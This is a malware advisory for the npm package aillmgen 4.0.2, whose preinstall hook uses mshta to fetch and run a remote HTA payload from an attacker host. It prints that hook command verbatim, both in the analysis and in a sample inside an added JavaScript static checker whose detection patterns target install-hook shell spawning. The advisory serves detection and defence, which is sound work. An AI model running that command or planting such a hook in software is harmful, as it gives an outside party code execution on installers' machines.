Malicious package

aillmgen (npm)

Malicious code in aillmgen (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5927
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall aillmgen

What this malware does

On npm install, the package's preinstall hook (preinstall.js) runs exec('cmd /c "mshta http://fixars.top"'), invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose: the library code references an EasyLLMClient targeting api.easyllm.ai, while the package itself is published under the unrelated name aillmgen with empty author and description metadata. Together, install-time RCE, a plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata mark this package as a supply-chain dropper.
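A static check for the install-hook behavior described above, as an added example that is not part of the original advisory or any vendor's scanner. The rule set, the function names, the "node preinstall.js" manifest entry and the require('child_process') prefix in the sample are assumptions made for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during "npm install".
const HOOKS = ['preinstall', 'install', 'postinstall'];

// Illustrative patterns (assumed for this example), not a complete detection set.
const RULES = [
  { id: 'lolbin-mshta', re: /\bmshta(\.exe)?\b/i },
  { id: 'shell-spawn', re: /\b(exec|execSync|spawn|spawnSync)\s*\(/ },
  { id: 'cmd-wrapper', re: /\bcmd(\.exe)?\s+\/c\b/i },
  { id: 'plaintext-url', re: /\bhttp:\/\/[^\s"')]+/i },
];

// Collect the hook command itself and, for "node <file>.js", the script source.
function hookSources(manifest, files) {
  const out = [];
  for (const hook of HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    out.push({ hook, where: 'package.json', text: cmd });
    const m = cmd.match(/\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/);
    if (m && files[m[1]] !== undefined) {
      out.push({ hook, where: m[1], text: files[m[1]] });
    }
  }
  return out;
}

function auditPackage(manifest, files) {
  const findings = [];
  for (const src of hookSources(manifest, files)) {
    for (const rule of RULES) {
      if (rule.re.test(src.text)) {
        findings.push({ hook: src.hook, where: src.where, rule: rule.id });
      }
    }
  }
  // An install hook that spawns a shell and names mshta is treated as blocking.
  const ids = new Set(findings.map(f => f.rule));
  const verdict = ids.has('lolbin-mshta') && ids.has('shell-spawn') ? 'block'
    : findings.length ? 'review' : 'ok';
  return { verdict, findings };
}

// Constructed sample mirroring the hook described in this advisory.
const sample = auditPackage(
  { name: 'aillmgen', version: '4.0.2', scripts: { preinstall: 'node preinstall.js' } },
  { 'preinstall.js': `require('child_process').exec('cmd /c "mshta http://fixars.top"');` }
);
console.log(sample.verdict, sample.findings.map(f => f.rule).join(','));
```

In CI, the manifest and script sources would come from the unpacked tarball before any install step runs; installing with npm's --ignore-scripts option prevents lifecycle hooks from executing at all.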

Malicious versions

1 flagged
4.0.2

Indicators of compromise (SHA-256)

5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341

Frequently asked questions

No. aillmgen on npm has been identified as a malicious package (version 4.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006837

Credits

  • Amazon Inspector · finder

aillmgen (npm) malicious package — MAL-2026-5927 | O3 Security